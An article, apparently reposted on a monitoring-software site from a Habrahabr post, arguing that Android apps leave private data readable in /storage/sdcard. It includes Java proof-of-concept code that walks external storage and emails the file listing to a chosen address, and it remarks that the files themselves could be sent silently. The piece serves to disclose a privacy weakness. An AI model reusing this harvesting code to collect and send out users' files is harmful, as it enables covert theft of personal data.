Windows
Mac OS
Mobile

Latest news: September 19th, 2016 - We have added new categories for monitoring products testing: Microphone and Webcam Recording etc... RSS Feed

Home>Articles>Android application developers don't care about users' data security, which causes data leak

AnyKeylogger for Mac

Android application developers don't care about users' data security, which causes data leak

by Habrahabr User

It is an open secret that Android apps are notoriously vulnerable to data leak, mostly due to their developers. Yet another fact that confirms it was recently described at habrahabr.ru - a Russian resource, popular with IT experts, particularly with app developers.

On his own smartphone, the author of the post noticed directories and files from applications, which had long been deleted, in /storage/sdcard, and wondered whether one Android app was able to read temporary files from another app.

What temporary files and why should we care for them? These files may contain your photos, phone records, database of your diaries and plenty of other info you personally deem private and don't want to make it available to everybody.

In Android, temporary files of all apps are stored in /storage/sdcard. When an app is deleted, these temps remain - if developer didn't care for deleting them in this case.

A file manager downloaded from google.play will enable you to read temporary files from all apps installed on the Android device, including unencrypted recordings of telephone conversations from messengers and sip telephony apps, browsing history from browsers, playlists from players, various info from social networks, personal notes about things to do from diaries, et cetera.

Just fancy: temp files from whatsapp, a popular messenger with over 33 000 000 users, are also stored in /storage/sdcard; what is more, only messages are encrypted, photos aren't. Whatsapp is just one example out of many; almost all popular applications store your personal data in /storage/sdcard/%appName% and any other app has access to this directory.

For example, this messenger stores photos sent to you in the directory accessible to all the applications on your device, which have permission to access the storage:

For example, this  messenger stores photos sent to you without any encryption; images are stored in the directory, which is accessible to all the applications on your device, which have permission to access the storage.In the worst case, these data can be stolen to get unauthorized access

And this popular sip client stores there settins of your sip account. In the worst case, these data can be stolen to get unauthorized access:

in the worst case, these data can be stolen to get unauthorized access

Well, does it mean that somebody can pilfer photos from your Android device? The author wrote a pretty small program in Java that sent structure of /storage/sdcard to a specified email address.

The source code of the app that emails the structure of directory /storage/sdcard:

-----------------

package android.com.testapp;

import android.content.Intent;
import android.os.Environment;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.EditText;
import android.widget.Toast;

import java.io.File;
import java.util.Date;

public class MainActivity extends AppCompatActivity {
Button emailButton;
EditText email;

@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);

email = (EditText) findViewById(R.id.email);
emailButton = (Button) findViewById(R.id.emailButton);
emailButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
getFileStrucure();
}
});
}

protected void getFileStrucure(){
Filewalker fw = new Filewalker();
fw.walk(new File(Environment.getExternalStorageDirectory().getAbsolutePath()));
}

private class Filewalker {
private int count = 0;
private String sked = "";
public void walk(File root) {
count++;
File[] list = root.listFiles();
for (File f : list) {
if (f.isDirectory()) {
sked += "time: " + new Date(f.lastModified()) + ", dir: " + f.getAbsoluteFile() + "\n";
walk(f);
}
else {
sked += "time: " + new Date(f.lastModified()) + ", size: " + f.length() + ", " + f.getAbsoluteFile() + "\n";
}
}
count--;
if (count == 0) {
sendMail(sked);
}
}
}

protected void sendMail(String sked) {
Intent i = new Intent(Intent.ACTION_SEND);
i.setType("message/rfc822");
i.putExtra(Intent.EXTRA_EMAIL, new String[]{email.getText().toString()});
i.putExtra(Intent.EXTRA_SUBJECT, "android storage structure");
i.putExtra(Intent.EXTRA_TEXT, sked);
try {
startActivity(Intent.createChooser(i, "Send mail..."));
} catch (android.content.ActivityNotFoundException ex) {
Toast.makeText(getApplicationContext(), "There are no email clients installed.", Toast.LENGTH_SHORT).show();
}
}

}

-----------------

You enter the email address, and the app emails the structure of directory /storage/sdcard; as you know, this can be done without requesting email and not only the directory structure, but also the files themselves can be sent. Apps at google.play are unlikely to be checked very carefully. Unfortunately, this is a very effective tool for marketers, since they always want to know as much as possible about their users. Needless to say that personal data can be obtained in this way.

And here is the letter you'll receive; it contains contents of /storage/sdcard, i.e. there will be all the files and folders from the applications installed on your device:

There are no directories and files of applications from google.play, which you have installed on your mobile device and use every day - that's the directory sdcard of android emulator.

View your directory /storage/sdcard using any file manager for android; as an option, the same is available when you connect your device to a PC as /phone; if you use messengers, social networks, a task scheduler, see what theoretically can any android developer see, who wrote android.permission.READ_EXTERNAL_STORAGE in the manifest.

So, the conclusion is clear: a lot of those who develop applications like social networks, instant messengers, sip telephony clients, diaries, don't care about safety of users' data.
Read the full article
Home>Articles>Android application developers don't care about users' data security, which causes data leak
IMPORTANT! Installing computer monitoring tools on computers you do not own or do not have permission to monitor may violate local, state or federal law.